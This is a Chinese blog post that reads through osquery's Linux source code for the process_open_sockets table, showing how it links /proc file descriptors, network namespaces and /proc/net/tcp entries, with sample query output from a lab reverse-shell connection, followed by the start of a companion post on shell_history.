Spoock 发布的文章

osquery源码解读之分析process_open_socket

说明

上篇文章主要是对shell_history的实现进行了分析。通过分析可以发现,osquery良好的设计使得源码简单易读。shell_history的整体实现也比较简单,通过读取并解析.bash_history中的内容,获得用户输入的历史命令。本文分析的是process_open_sockets,相比较而言实现更加复杂,对Linux也需要有更深的了解。

使用说明

首先查看process_open_sockets表的定义:

table_name("process_open_sockets")
description("Processes which have open network sockets on the system.")
schema([
    Column("pid", INTEGER, "Process (or thread) ID", index=True),
    Column("fd", BIGINT, "Socket file descriptor number"),
    Column("socket", BIGINT, "Socket handle or inode number"),
    Column("family", INTEGER, "Network protocol (IPv4, IPv6)"),
    Column("protocol", INTEGER, "Transport protocol (TCP/UDP)"),
    Column("local_address", TEXT, "Socket local address"),
    Column("remote_address", TEXT, "Socket remote address"),
    Column("local_port", INTEGER, "Socket local port"),
    Column("remote_port", INTEGER, "Socket remote port"),
    Column("path", TEXT, "For UNIX sockets (family=AF_UNIX), the domain path"),
])
extended_schema(lambda: LINUX() or DARWIN(), [
    Column("state", TEXT, "TCP socket state"),
])
extended_schema(LINUX, [
    Column("net_namespace", TEXT, "The inode number of the network namespace"),
])
implementation("system/process_open_sockets@genOpenSockets")
examples([
  "select * from process_open_sockets where pid = 1",
])

其中有几个列名需要说明一下:

  • fd,表示文件描述符
  • socket,进行网络通讯时,socket通信对应的inode number
  • family,表示是IPv4/IPv6,最后的结果是以数字的方式展示
  • protocol,表示是TCP/UDP。

我们进行一个简单的反弹shell的操作,然后使用查询process_open_sockets表的信息。

osquery> select pos.*,p.cwd,p.cmdline from process_open_sockets pos left join processes p where pos.family=2 and pos.pid=p.pid and net_namespace<>0;
+-------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+-----------------+-----------+
| pid   | fd | socket   | family | protocol | local_address | remote_address | local_port | remote_port | path | state       | net_namespace | cwd             | cmdline   |
+-------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+-----------------+-----------+
| 37272 | 15 | 52319299 | 2      | 6        | 192.168.2.142 | 172.22.0.176   | 43522      | 9091        |      | ESTABLISHED | 4026531956    | /home/xingjun   | osqueryi  |
| 91155 | 2  | 56651533 | 2      | 6        | 192.168.2.142 | 192.168.2.150  | 53486      | 8888        |      | ESTABLISHED | 4026531956    | /proc/79036/net | /bin/bash |
+-------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+-----------------+-----------+

process_open_sockets表的实现是位于osquery/tables/networking/linux/process_open_sockets.cpp中。

分析

process_open_sockets的实现全部是在QueryData genOpenSockets(QueryContext &context)一个方法中。

官方给出的分析步骤是:

Data for this table is fetched from 3 different sources and correlated.

1.Collect all sockets associated with each pid by going through all files under /proc/<pid>/fd and search for links of the type socket:[<inode>]. Extract the inode and fd (filename) and index it by inode number. The inode can then be used to correlate pid and fd with the socket information collected on step 3. The map generated in this step will only contain sockets associated with pids in the list, so it will also be used to filter the sockets later if pid_filter is set.

2.Collect the inode for the network namespace associated with each pid. Every time a new namespace is found execute step 3 to get socket basic information.

3.Collect basic socket information for all sockets under a specifc network namespace. This is done by reading through files under /proc/<pid>/net for the first pid we find in a certain namespace. Notice this will collect information for all sockets on the namespace not only for sockets associated with the specific pid, therefore only needs to be run once. From this step we collect the inodes of each of the sockets, and will use that to correlate the socket information with the information collect on steps 1 and 2.

其实大致步骤就是:

  1. 收集进程所对应的fd信息,尤其是socketinode信息;
  2. 收集进程的namespaceinode信息;
  3. 读取/proc/<pid>/net中的信息,与第一步中的socketinode信息进行比对,找出pid所对应的网络连接信息。

为了方便说明,我对整个函数的代码进行切割,分步说明。

获取pid信息

std::set <std::string> pids;
if (context.constraints["pid"].exists(EQUALS)) {
    pids = context.constraints["pid"].getAll(EQUALS);
}

bool pid_filter = !(pids.empty() ||
                    std::find(pids.begin(), pids.end(), "-1") != pids.end());

if (!pid_filter) {
    pids.clear();
    status = osquery::procProcesses(pids);
    if (!status.ok()) {
        VLOG(1) << "Failed to acquire pid list: " << status.what();
        return results;
    }
}
  • 前面的context.constraints["pid"].exists(EQUALS)pid_filter为了判断在SQL语句中是否存在where子句以此拿到选择的pid
  • 调用status = osquery::procProcesses(pids);拿到对应的PID信息。

跟踪进入到osquery/filesystem/linux/proc.cpp:procProcesses(std::set<std::string>& processes):

Status procProcesses(std::set<std::string>& processes) {
  auto callback = [](const std::string& pid,
                     std::set<std::string>& _processes) -> bool {
    _processes.insert(pid);
    return true;
  };

  return procEnumerateProcesses<decltype(processes)>(processes, callback);
}

继续跟踪进入到osquery/filesystem/linux/proc.h:procEnumerateProcesses(UserData& user_data,bool (*callback)(const std::string&, UserData&))

const std::string kLinuxProcPath = "/proc";
.....
template<typename UserData>
Status procEnumerateProcesses(UserData &user_data,bool (*callback)(const std::string &, UserData &)) {
    boost::filesystem::directory_iterator it(kLinuxProcPath), end;

    try {
        for (; it != end; ++it) {
            if (!boost::filesystem::is_directory(it->status())) {
                continue;
            }

            // See #792: std::regex is incomplete until GCC 4.9
            const auto &pid = it->path().leaf().string();
            if (std::atoll(pid.data()) <= 0) {
                continue;
            }

            bool ret = callback(pid, user_data);
            if (ret == false) {
                break;
            }
        }
    } catch (const boost::filesystem::filesystem_error &e) {
        VLOG(1) << "Exception iterating Linux processes: " << e.what();
        return Status(1, e.what());
    }

    return Status(0);
}
  • boost::filesystem::directory_iterator it(kLinuxProcPath), end;遍历/proc目录下面所有的文件,
  • const auto &pid = it->path().leaf().string();..; bool ret = callback(pid, user_data);,通过it->path().leaf().string()判断是否为数字,之后调用bool ret = callback(pid, user_data);
  • callback方法_processes.insert(pid);return true;将查询到的pid全部记录到user_data中。

以一个反弹shell的例子为例,使用osqueryi查询到的信息如下:

osquery> select * from process_open_sockets where pid=14960; 
+-------+----+--------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+
| pid   | fd | socket | family | protocol | local_address | remote_address | local_port | remote_port | path | state       | net_namespace |
+-------+----+--------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+
| 14960 | 2  | 307410 | 2      | 6        | 192.168.2.156 | 192.168.2.145  | 51118      | 8888        |      | ESTABLISHED | 4026531956    |
+-------+----+--------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+

获取进程对应的pid和fd信息

/* Use a set to record the namespaces already processed */
std::set <ino_t> netns_list;
SocketInodeToProcessInfoMap inode_proc_map;
SocketInfoList socket_list;
for (const auto &pid : pids) {
    /* Step 1 */
    status = procGetSocketInodeToProcessInfoMap(pid, inode_proc_map);
    if (!status.ok()) {
        VLOG(1) << "Results for process_open_sockets might be incomplete. Failed "
                    "to acquire socket inode to process map for pid "
                << pid << ": " << status.what();
    }

在拿到所有的需要查询的pid信息之后,调用status = procGetSocketInodeToProcessInfoMap(pid, inode_proc_map);,顾名思义就是用于获取进程所对应的socket inode编号。进入到osquery/filesystem/linux/proc.cpp:procGetSocketInodeToProcessInfoMap()中:

Status procGetSocketInodeToProcessInfoMap(const std::string &pid,SocketInodeToProcessInfoMap &result) {
    auto callback = [](const std::string &_pid,
                        const std::string &fd,
                        const std::string &link,
                        SocketInodeToProcessInfoMap &_result) -> bool {
        /* We only care about sockets. But there will be other descriptors. */
        if (link.find("socket:[") != 0) {
            return true;
        }

        std::string inode = link.substr(8, link.size() - 9);
        _result[inode] = {_pid, fd};
        return true;
    };

    return procEnumerateProcessDescriptors<decltype(result)>(
            pid, result, callback);
}

其中的auto callback定义的是一个回调函数,进入到procEnumerateProcessDescriptors()中分析:

const std::string kLinuxProcPath = "/proc";
....
template<typename UserData>
Status procEnumerateProcessDescriptors(const std::string &pid,
                                        UserData &user_data,
                                        bool (*callback)(const std::string &pid,
                                                        const std::string &fd,
                                                        const std::string &link,
                                                        UserData &user_data)) {
    std::string descriptors_path = kLinuxProcPath + "/" + pid + "/fd";

    try {
        boost::filesystem::directory_iterator it(descriptors_path), end;

        for (; it != end; ++it) {
            auto fd = it->path().leaf().string();

            std::string link;
            Status status = procReadDescriptor(pid, fd, link);
            if (!status.ok()) {
                VLOG(1) << "Failed to read the link for file descriptor " << fd
                        << " of pid " << pid << ". Data might be incomplete.";
            }

            bool ret = callback(pid, fd, link, user_data);
            if (ret == false) {
                break;
            }
        }
    } catch (boost::filesystem::filesystem_error &e) {
        VLOG(1) << "Exception iterating process file descriptors: " << e.what();
        return Status(1, e.what());
    }

    return Status(0);
}

这个代码写得十分清晰。

1.遍历/proc/pid/fd,拿到所有的文件描述符。在本例中即为/proc/14960/fd

1.jpg

2.回调bool ret = callback(pid, fd, link, user_data);,即之前在procGetSocketInodeToProcessInfoMap中定义的:

auto callback = [](const std::string &_pid,
                    const std::string &fd,
                    const std::string &link,
                    SocketInodeToProcessInfoMap &_result) -> bool {
    /* We only care about sockets. But there will be other descriptors. */
    if (link.find("socket:[") != 0) {
        return true;
    }

    std::string inode = link.substr(8, link.size() - 9);
    _result[inode] = {_pid, fd};
    return true;
};

代码也十分地简单,拿到fd所对应的link,检查是否存在socket:[,如果存在获取对应的inode。由于查询的是process_open_sockets,所以我们仅仅只关心存在socket的link,在本例中就是307410。最终在SocketInodeToProcessInfoMap中的结构就是_result[inode] = {_pid, fd};。以inode作为key,包含了pidfd的信息。

获取进程对应的ns信息

在上一步status = procGetSocketInodeToProcessInfoMap(pid, inode_proc_map);执行完毕之后,得到_result[inode] = {_pid, fd};。将inodepidfd进行了关联。接下里就是解析进程对应的ns信息。

ino_t ns;
ProcessNamespaceList namespaces;
status = procGetProcessNamespaces(pid, namespaces, {"net"});
if (status.ok()) {
    ns = namespaces["net"];
} else {
    /* If namespaces are not available we allways set ns to 0 and step 3 will
        * run once for the first pid in the list.
        */
    ns = 0;
    VLOG(1) << "Results for the process_open_sockets might be incomplete."
                "Failed to acquire network namespace information for process "
                "with pid "
            << pid << ": " << status.what();
}
跟踪进入到`status = procGetProcessNamespaces(pid, namespaces, {"net"});`,进入到`osquery/filesystem/linux/proc.cpp:procGetProcessNamespaces()`
const std::string kLinuxProcPath = "/proc";
...
Status procGetProcessNamespaces(const std::string &process_id,ProcessNamespaceList &namespace_list,std::vector <std::string> namespaces) {
    namespace_list.clear();
    if (namespaces.empty()) {
        namespaces = kUserNamespaceList;
    }
    auto process_namespace_root = kLinuxProcPath + "/" + process_id + "/ns";
    for (const auto &namespace_name : namespaces) {
        ino_t namespace_inode;
        auto status = procGetNamespaceInode(namespace_inode, namespace_name, process_namespace_root);
        if (!status.ok()) {
            continue;
        }
        namespace_list[namespace_name] = namespace_inode;
    }
    return Status(0, "OK");
}

遍历const auto &namespace_name : namespaces,之后进入到process_namespace_root中,调用procGetNamespaceInode(namespace_inode, namespace_name, process_namespace_root);进行查询。在本例中namespaces{"net"},process_namespace_root/proc/14960/ns

分析procGetNamespaceInode(namespace_inode, namespace_name, process_namespace_root):

Status procGetNamespaceInode(ino_t &inode,const std::string &namespace_name,const std::string &process_namespace_root) {
    inode = 0;
    auto path = process_namespace_root + "/" + namespace_name;
    char link_destination[PATH_MAX] = {};
    auto link_dest_length = readlink(path.data(), link_destination, PATH_MAX - 1);
    if (link_dest_length < 0) {
        return Status(1, "Failed to retrieve the inode for namespace " + path);
    }

    // The link destination must be in the following form: namespace:[inode]
    if (std::strncmp(link_destination,
                        namespace_name.data(),
                        namespace_name.size()) != 0 ||
        std::strncmp(link_destination + namespace_name.size(), ":[", 2) != 0) {
        return Status(1, "Invalid descriptor for namespace " + path);
    }

    // Parse the inode part of the string; strtoull should return us a pointer
    // to the closing square bracket
    const char *inode_string_ptr = link_destination + namespace_name.size() + 2;
    char *square_bracket_ptr = nullptr;

    inode = static_cast<ino_t>(
            std::strtoull(inode_string_ptr, &square_bracket_ptr, 10));
    if (inode == 0 || square_bracket_ptr == nullptr ||
        *square_bracket_ptr != ']') {
        return Status(1, "Invalid inode value in descriptor for namespace " + path);
    }

    return Status(0, "OK");
}

根据procGetProcessNamespaces()中定义的相关变量,得到path是/proc/pid/ns/net,在本例中是/proc/14960/ns/net。通过inode = static_cast<ino_t>(std::strtoull(inode_string_ptr, &square_bracket_ptr, 10));,解析/proc/pid/ns/net所对应的inode。在本例中:

2.jpg

所以取到的inode4026531956。之后在procGetProcessNamespaces()中执行namespace_list[namespace_name] = namespace_inode;,所以namespace_list['net']=4026531956。最终ns = namespaces["net"];,所以得到的ns=4026531956

解析进程的net信息

// Linux proc protocol define to net stats file name.
const std::map<int, std::string> kLinuxProtocolNames = {
        {IPPROTO_ICMP,    "icmp"},
        {IPPROTO_TCP,     "tcp"},
        {IPPROTO_UDP,     "udp"},
        {IPPROTO_UDPLITE, "udplite"},
        {IPPROTO_RAW,     "raw"},
};
...
if (netns_list.count(ns) == 0) {
    netns_list.insert(ns);

    /* Step 3 */
    for (const auto &pair : kLinuxProtocolNames) {
        status = procGetSocketList(AF_INET, pair.first, ns, pid, socket_list);
        if (!status.ok()) {
            VLOG(1)
                    << "Results for process_open_sockets might be incomplete. Failed "
                        "to acquire basic socket information for AF_INET "
                    << pair.second << ": " << status.what();
        }

        status = procGetSocketList(AF_INET6, pair.first, ns, pid, socket_list);
        if (!status.ok()) {
            VLOG(1)
                    << "Results for process_open_sockets might be incomplete. Failed "
                        "to acquire basic socket information for AF_INET6 "
                    << pair.second << ": " << status.what();
        }
    }
    status = procGetSocketList(AF_UNIX, IPPROTO_IP, ns, pid, socket_list);
    if (!status.ok()) {
        VLOG(1)
                << "Results for process_open_sockets might be incomplete. Failed "
                    "to acquire basic socket information for AF_UNIX: "
                << status.what();
    }
}

对于icmp/tcp/udp/udplite/raw会调用status = procGetSocketList(AF_INET|AF_INET6|AF_UNIX, pair.first, ns, pid, socket_list);。我们这里仅仅以procGetSocketList(AF_INET, pair.first, ns, pid, socket_list);进行说明(其中的ns就是4026531956)。

Status procGetSocketList(int family, int protocol,ino_t net_ns,const std::string &pid, SocketInfoList &result) {
    std::string path = kLinuxProcPath + "/" + pid + "/net/";

    switch (family) {
        case AF_INET:
            if (kLinuxProtocolNames.count(protocol) == 0) {
                return Status(1,"Invalid family " + std::to_string(protocol) +" for AF_INET familiy");
            } else {
                path += kLinuxProtocolNames.at(protocol);
            }
            break;

        case AF_INET6:
            if (kLinuxProtocolNames.count(protocol) == 0) {
                return Status(1,"Invalid protocol " + std::to_string(protocol) +" for AF_INET6 familiy");
            } else {
                path += kLinuxProtocolNames.at(protocol) + "6";
            }
            break;

        case AF_UNIX:
            if (protocol != IPPROTO_IP) {
                return Status(1,
                                "Invalid protocol " + std::to_string(protocol) +
                                " for AF_UNIX familiy");
            } else {
                path += "unix";
            }

            break;

        default:
            return Status(1, "Invalid family " + std::to_string(family));
    }

    std::string content;
    if (!osquery::readFile(path, content).ok()) {
        return Status(1, "Could not open socket information from " + path);
    }

    Status status(0);
    switch (family) {
        case AF_INET:
        case AF_INET6:
            status = procGetSocketListInet(family, protocol, net_ns, path, content, result);
            break;

        case AF_UNIX:
            status = procGetSocketListUnix(net_ns, path, content, result);
            break;
    }

    return status;
}

由于我们的传参是family=AF_INET,protocol=tcp,net_ns=4026531956,pid=14960。执行流程如下:

1.path += kLinuxProtocolNames.at(protocol);,得到path是/proc/14960/net/tcp

2.osquery::readFile(path, content).ok(),读取文件内容,即/proc/14960/net/tcp所对应的文件内容。在本例中是:

sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
0: 00000000:1538 00000000:0000 0A 00000000:00000000 00:00000000 00000000    26        0 26488 1 ffff912c69c21740 100 0 0 10 0
1: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 28721 1 ffff912c69c23640 100 0 0 10 0
2: 00000000:01BB 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 27739 1 ffff912c69c21f00 100 0 0 10 0
3: 0100007F:18EB 00000000:0000 0A 00000000:00000000 00:00000000 00000000   988        0 25611 1 ffff912c69c207c0 100 0 0 10 0
4: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 27737 1 ffff912c69c226c0 100 0 0 10 0
5: 017AA8C0:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 29031 1 ffff912c69c23e00 100 0 0 10 0
6: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 25754 1 ffff912c69c20f80 100 0 0 10 0
7: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 25590 1 ffff912c69c20000 100 0 0 10 0
8: 9C02A8C0:C7AE 9102A8C0:22B8 01 00000000:00000000 00:00000000 00000000  1000

3.执行procGetSocketListInet(family, protocol, net_ns, path, content, result);

分析

static Status procGetSocketListInet(int family,int protocol,ino_t net_ns,const std::string &path,const std::string &content,SocketInfoList &result) {
    // The system's socket information is tokenized by line.
    bool header = true;
    for (const auto &line : osquery::split(content, "\n")) {
        if (header) {
            if (line.find("sl") != 0 && line.find("sk") != 0) {
                return Status(1, std::string("Invalid file header for ") + path);
            }
            header = false;
            continue;
        }

        // The socket information is tokenized by spaces, each a field.
        auto fields = osquery::split(line, " ");
        if (fields.size() < 10) {
            VLOG(1) << "Invalid socket descriptor found: '" << line
                    << "'. Skipping this entry";
            continue;
        }

        // Two of the fields are the local/remote address/port pairs.
        auto locals = osquery::split(fields[1], ":");
        auto remotes = osquery::split(fields[2], ":");

        if (locals.size() != 2 || remotes.size() != 2) {
            VLOG(1) << "Invalid socket descriptor found: '" << line
                    << "'. Skipping this entry";
            continue;
        }

        SocketInfo socket_info = {};
        socket_info.socket = fields[9];
        socket_info.net_ns = net_ns;
        socket_info.family = family;
        socket_info.protocol = protocol;
        socket_info.local_address = procDecodeAddressFromHex(locals[0], family);
        socket_info.local_port = procDecodePortFromHex(locals[1]);
        socket_info.remote_address = procDecodeAddressFromHex(remotes[0], family);
        socket_info.remote_port = procDecodePortFromHex(remotes[1]);

        if (protocol == IPPROTO_TCP) {
            char *null_terminator_ptr = nullptr;
            auto integer_socket_state =
                    std::strtoull(fields[3].data(), &null_terminator_ptr, 16);
            if (integer_socket_state == 0 ||
                integer_socket_state >= tcp_states.size() ||
                null_terminator_ptr == nullptr || *null_terminator_ptr != 0) {
                socket_info.state = "UNKNOWN";
            } else {
                socket_info.state = tcp_states[integer_socket_state];
            }
        }

        result.push_back(std::move(socket_info));
    }

    return Status(0);
}

整个执行流程如下:

1.const auto &line : osquery::split(content, "\n");.. auto fields = osquery::split(line, " ");解析文件,读取每一行的内容。对每一行采用空格分割;

2.解析信息

SocketInfo socket_info = {};
socket_info.socket = fields[9];
socket_info.net_ns = net_ns;
socket_info.family = family;
socket_info.protocol = protocol;
socket_info.local_address = procDecodeAddressFromHex(locals[0], family);
socket_info.local_port = procDecodePortFromHex(locals[1]);
socket_info.remote_address = procDecodeAddressFromHex(remotes[0], family);
socket_info.remote_port = procDecodePortFromHex(remotes[1]);

解析/proc/14960/net/tcp文件中的每一行,分别填充至socket_info结构中。但是在/proc/14960/net/tcp并不是所有的信息都是我们需要的,我们还需要对信息进行过滤。可以看到最后一条的inode307410才是我们需要的。

获取进程连接信息

将解析完毕/proc/14960/net/tcp获取socket_info之后,继续执行genOpenSockets()中的代码。

    auto proc_it = inode_proc_map.find(info.socket);
    if (proc_it != inode_proc_map.end()) {
        r["pid"] = proc_it->second.pid;
        r["fd"] = proc_it->second.fd;
    } else if (!pid_filter) {
        r["pid"] = "-1";
        r["fd"] = "-1";
    } else {
        /* If we're filtering by pid we only care about sockets associated with
            * pids on the list.*/
        continue;
    }

    r["socket"] = info.socket;
    r["family"] = std::to_string(info.family);
    r["protocol"] = std::to_string(info.protocol);
    r["local_address"] = info.local_address;
    r["local_port"] = std::to_string(info.local_port);
    r["remote_address"] = info.remote_address;
    r["remote_port"] = std::to_string(info.remote_port);
    r["path"] = info.unix_socket_path;
    r["state"] = info.state;
    r["net_namespace"] = std::to_string(info.net_ns);

    results.push_back(std::move(r));
}

其中关键代码是:

auto proc_it = inode_proc_map.find(info.socket);
if (proc_it != inode_proc_map.end()) {

通过遍历socket_list,判断在第一步保存在inode_proc_map中的inode信息与info中的inode信息是否一致,如果一致,说明就是我们需要的那个进程的网络连接的信息。最终保存我们查询到的信息results.push_back(std::move(r));
到这里,我们就查询到了进程的所有的网络连接的信息。最终通过osquery展现。

osquery> select * from process_open_sockets where pid=14960; 
+-------+----+--------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+
| pid   | fd | socket | family | protocol | local_address | remote_address | local_port | remote_port | path | state       | net_namespace |
+-------+----+--------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+
| 14960 | 2  | 307410 | 2      | 6        | 192.168.2.156 | 192.168.2.145  | 51118      | 8888        |      | ESTABLISHED | 4026531956    |
+-------+----+--------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+

以上就是整个osquery执行process_open_sockets表查询的整个流程。

扩展

Linux一些皆文件的特性,使得我们能够通过读取Linux下某些文件信息获取系统/进程所有的信息。在前面我们仅仅是从osquery的角度来分析的。本节主要是对Linux中的与网络有关、进程相关的信息进行说明。

/proc/net/tcp/proc/net/udp中保存了当前系统中所有的进程信息,与/proc/pid/net/tcp或者是/proc/pid/net/udp中保存的信息完全相同。

/proc/net/tcp信息如下:

sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
0: 00000000:1538 00000000:0000 0A 00000000:00000000 00:00000000 00000000    26        0 26488 1 ffff912c69c21740 100 0 0 10 0
1: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 28721 1 ffff912c69c23640 100 0 0 10 0
2: 00000000:01BB 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 27739 1 ffff912c69c21f00 100 0 0 10 0
3: 00000000:1F40 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 471681 1 ffff912c37488f80 100 0 0 10 0
4: 0100007F:18EB 00000000:0000 0A 00000000:00000000 00:00000000 00000000   988        0 25611 1 ffff912c69c207c0 100 0 0 10 0
5: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 27737 1 ffff912c69c226c0 100 0 0 10 0
6: 017AA8C0:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 29031 1 ffff912c69c23e00 100 0 0 10 0
7: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 25754 1 ffff912c69c20f80 100 0 0 10 0
8: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 25590 1 ffff912c69c20000 100 0 0 10 0
9: 9C02A8C0:C7AE 9102A8C0:22B8 01 00000000:00000000 00:00000000 00000000  1000        0 307410 1 ffff912c374887c0 20 0 0 10 -1

/proc/14960/net/tcp信息如下:

sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
0: 00000000:1538 00000000:0000 0A 00000000:00000000 00:00000000 00000000    26        0 26488 1 ffff912c69c21740 100 0 0 10 0
1: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 28721 1 ffff912c69c23640 100 0 0 10 0
2: 00000000:01BB 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 27739 1 ffff912c69c21f00 100 0 0 10 0
3: 0100007F:18EB 00000000:0000 0A 00000000:00000000 00:00000000 00000000   988        0 25611 1 ffff912c69c207c0 100 0 0 10 0
4: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 27737 1 ffff912c69c226c0 100 0 0 10 0
5: 017AA8C0:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 29031 1 ffff912c69c23e00 100 0 0 10 0
6: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 25754 1 ffff912c69c20f80 100 0 0 10 0
7: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 25590 1 ffff912c69c20000 100 0 0 10 0
8: 9C02A8C0:C7AE 9102A8C0:22B8 01 00000000:00000000 00:00000000 00000000  1000        0 307410 1 ffff912c374887c0 20 0 0 10 -1

我们每一列的含义都是固定的,我们以最终一列9C02A8C0:C7AE 9102A8C0:22B8 01 00000000:00000000 00:00000000 00000000 1000 0 307410 1 ffff912c374887c0 20 0 0 10 -1为例进行说明。

1.local_address,本地通讯端口和IP,本例是9C02A8C0:C7AE9C02A8C0,是本地IP。9C02A8C0是十六进制,转换为十进制是2617419968,将其转换为IP地址则是156.2.168.192,倒装一下得到192.168.2.156C7AE转化为十进制是51118。所以当进行网络通信时,得到本地IP是192.168.2.156,端口是51118

2.rem_address,远程服务器通信端口和IP,本例是9102A8C0:22B89102A8C0是远程IP。分析方法和local_address相同,得到远程IP是192.168.2.145,端口是8888

3.st,socket的状态,本例是01st的不同的值表示不同的含义。

  • 01: ESTABLISHED,
  • 02: SYN_SENT
  • 03: SYN_RECV
  • 04: FIN_WAIT1
  • 05: FIN_WAIT2
  • 06: TIME_WAIT
  • 07: CLOSE
  • 08: CLOSE_WAIT
  • 09: LAST_ACK
  • 0A: LISTEN
  • 0B: CLOSING

所以在本例中01则说明是ESTABLISHED状态。

4.tx_queue, 表示发送队列中的数据长度,本例是00000000

5.rx_queue, 如果状态是ESTABLISHED,表示接受队列中数据长度;如果是LISTEN,表示已完成连接队列的长度;

6.tr,定时器类型。为0,表示没有启动计时器;为1,表示重传定时器;为2,表示连接定时器;为3,表示TIME_WAIT定时器;为4,表示持续定时器;

7.tm->when,超时时间。

8.retrnsmt,超时重传次数

9.uid,用户id

10.timeout,持续定时器或保洁定时器周期性发送出去但未被确认的TCP段数目,在收到ACK之后清零

11.inode,socket连接对应的inode

12.1,没有显示header,表示的是socket的引用数目

13.ffff912c374887c0,没有显示header,表示sock结构对应的地址

14.20,没有显示header,表示RTO,单位是clock_t

15.0,用来计算延时确认的估值

16.0,快速确认数和是否启用标志位的或元算结果

17.10,当前拥塞窗口大小

18.-1,如果慢启动阈值大于等于0x7fffffff显示-1,否则表示慢启动阈值

proc_net_tcp_decode这篇文章对每个字段也进行了详细地说明。

通过查看某个具体的pidfd信息,检查是否存在以socket:开头的文件描述符,如果存在则说明存在网络通信。

3.jpg

在得到了socket所对应的inode之后,就可以在/proc/net/tcp中查询对应的socket的信息,比如远程服务器的IP和端口信息。这样通过socketinode就可以关联进程信息和它的网络信息。

总结

论读源代码的重要性

以上

osquery源码解读之分析shell_history

说明

前面两篇主要是对osquery的使用进行了说明,本篇文章将会分析osquery的源码。本文将主要对shell_historyprocess_open_sockets两张表进行说明。通过对这些表的实现分析,一方面能够了解osquery的实现通过SQL查询系统信息的机制,另一方面可以加深对Linux系统的理解。

表的说明

shell_history是用于查看shell的历史记录,而process_open_sockets是用于记录主机当前的网络行为。示例用法如下:

shell_history

osquery> select * from shell_history limit 3;
+------+------+-------------------------------------------------------------------+-----------------------------+
| uid  | time | command                                                           | history_file                |
+------+------+-------------------------------------------------------------------+-----------------------------+
| 1000 | 0    | pwd                                                               | /home/username/.bash_history |
| 1000 | 0    | ps -ef                                                            | /home/username/.bash_history |
| 1000 | 0    | ps -ef | grep java                                                | /home/username/.bash_history |
+------+------+-------------------------------------------------------------------+-----------------------------+

process_open_socket显示了一个反弹shell的链接。

osquery> select * from process_open_sockets order by pid desc limit 1;
+--------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+------------+---------------+
| pid    | fd | socket   | family | protocol | local_address | remote_address | local_port | remote_port | path | state      | net_namespace |
+--------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+------------+---------------+
| 115567 | 3  | 16467630 | 2      | 6        | 192.168.2.142 | 192.168.2.143  | 46368      | 8888        |      | ESTABLISH  | 0             |
+--------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+------------+---------------+

osquery整体的代码结构十分地清晰。所有表的定义都是位于specs下面,所有表的实现都是位于osquery/tables

我们以shell_history为例,其表的定义是在specs/posix/shell_history.table

table_name("shell_history")
description("A line-delimited (command) table of per-user .*_history data.")
schema([
    Column("uid", BIGINT, "Shell history owner", additional=True),
    Column("time", INTEGER, "Entry timestamp. It could be absent, default value is 0."),
    Column("command", TEXT, "Unparsed date/line/command history line"),
    Column("history_file", TEXT, "Path to the .*_history for this user"),
    ForeignKey(column="uid", table="users"),
])
attributes(user_data=True, no_pkey=True)
implementation("shell_history@genShellHistory")
examples([
    "select * from users join shell_history using (uid)",
])
fuzz_paths([
    "/home",
    "/Users",
])s

shell_history.table中已经定义了相关的信息,入口是shell_history.cpp中的genShellHistory()函数,甚至给出了示例的SQL语句select * from users join shell_history using (uid)shell_history.cpp是位于osquery/tables/system/posix/shell_history.cpp中。

同理,process_open_sockets的表定义位于specs/process_open_sockets.table,实现位于osquery/tables/networking/[linux|freebsd|windows]/process_open_sockets.cpp。可以看到由于process_open_sockets在多个平台上面都有,所以在linux/freebsd/windows中都存在process_open_sockets.cpp的实现。本文主要是以linux为例。

shell_history实现

前提知识

在分析之前,介绍一下Linux中的一些基本概念。我们常常会看到各种不同的unix shell,如bash、zsh、tcsh、sh等等。bash是我们目前最常见的,它几乎是所有的类unix操作中内置的一个shell。而zsh相对于bash增加了更多的功能。我们在终端输入各种命令时,其实都是使用的这些shell。

我们在用户的根目录下方利用ls -all就可以发现存在.bash_history文件,此文件就记录了我们在终端中输入的所有的命令。同样地,如果我们使用zsh,则会存在一个.zsh_history记录我们的命令。

同时在用户的根目录下还存在.bash_sessions的目录,根据这篇文章的介绍:

A new folder (~/.bash_sessions/) is used to store HISTFILE’s and .session files that are unique to sessions. If $BASH_SESSION or $TERM_SESSION_ID is set upon launching the shell (i.e. if Terminal is resuming from a saved state), the associated HISTFILE is merged into the current one, and the .session file is ran. Session saving is facilitated by means of an EXIT trap being set for a function bash_update_session_state.

